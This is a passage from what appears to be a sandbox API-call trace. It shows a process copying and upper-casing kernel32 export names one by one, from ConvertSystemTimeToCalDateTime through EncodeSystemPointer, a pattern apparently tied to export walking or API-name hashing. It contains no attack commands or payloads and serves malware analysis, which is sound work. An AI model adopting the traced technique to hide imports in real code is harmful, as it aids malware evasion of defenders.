lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.034] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.034] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.034] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.034] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.034] lstrlenA (lpString="COPYFILEA") returned 9 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.034] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.034] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.034] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.034] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.035] lstrlenA (lpString="COPYFILEW") returned 9 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.035] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.035] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.035] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.035] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.035] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.035] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.035] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.035] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.035] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.035] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.035] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.035] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.035] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.035] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.035] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.035] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.035] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.035] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.036] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.036] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.036] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.036] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.036] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.036] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.036] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.036] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.036] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.036] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.036] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.036] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.036] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.036] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.036] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.036] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.036] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.036] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.037] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.037] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.037] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.037] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.037] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.037] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.037] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.037] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.037] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.037] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.037] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.037] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.037] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.037] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.037] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.037] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.037] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.037] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.038] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.038] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.038] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.038] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.038] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.038] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.038] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.038] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.038] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.038] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.038] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.038] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.038] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.038] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.038] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.038] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.038] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.038] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.038] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.039] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.039] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.039] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.039] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.039] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.039] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.039] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.039] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.039] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.039] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.039] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.039] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.039] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.039] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.039] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.039] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.039] lstrlenA (lpString="DELETEATOM") returned 10 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.039] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.039] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.040] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.040] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.040] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.040] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.040] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.040] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.040] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.040] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.040] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.040] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.040] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.040] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.040] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.040] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.040] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.040] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.040] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.040] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.041] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.041] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.041] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.041] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.041] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.041] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.041] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.041] lstrlenA (lpString="ENCODESYSTEMPOINTER") 